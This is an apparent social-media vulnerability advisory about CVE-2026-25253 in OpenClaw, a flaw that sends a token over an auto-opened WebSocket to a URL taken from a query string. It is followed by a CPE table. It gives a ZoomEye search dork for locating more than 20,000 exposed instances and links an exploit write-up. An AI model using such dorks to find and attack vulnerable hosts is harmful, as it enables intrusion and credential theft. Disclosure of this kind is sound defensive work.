    🚨 CVE-2026-25253 (CVSS 8.8): OpenClaw Logical Flaw OpenClaw (aka clawdbot or Moltbot) before 2026.1.29 obtains a gatewayUrl value from a query string and automatically makes a WebSocket connection without prompting, sending a token value. Search by vul.cve Filter 👉 vul.cve="CVE-2026-25253" ZoomEye Dork 👉 app=OpenClaw 20k+ exposed instances. ZoomEye Link: https://www.zoomeye.ai/searchResult?q=dnVsLmN2ZT0iQ1ZFLTIwMjYtMjUyNTMi&utm_source=twitter&utm_medium=social&utm_campaign=cve_ops_20260204 Refer: https://depthfirst.com/post/1-click-rce-to-steal-your-moltbot-data-and-keys #ZoomEye #NetSec #OSINT #CyberSecurity #OpenClaw #VulnerabilityResearch #ThreatIntel #ZeroDay

    Post summary

    CVE‑2026‑25253 is a logical flaw in OpenClaw that allows remote code execution via auto WebSocket connections, with a publicly available "1‑click‑rce" exploit and over 20,000 exposed instances identified.

    0502031.8K
    11.9K followersView on X
CPE platform detail1 entries

1 of 1 entries

PartVendorProductVersionTarget SWTarget HW
Appopenclawopenclaw-node.js-

Explore more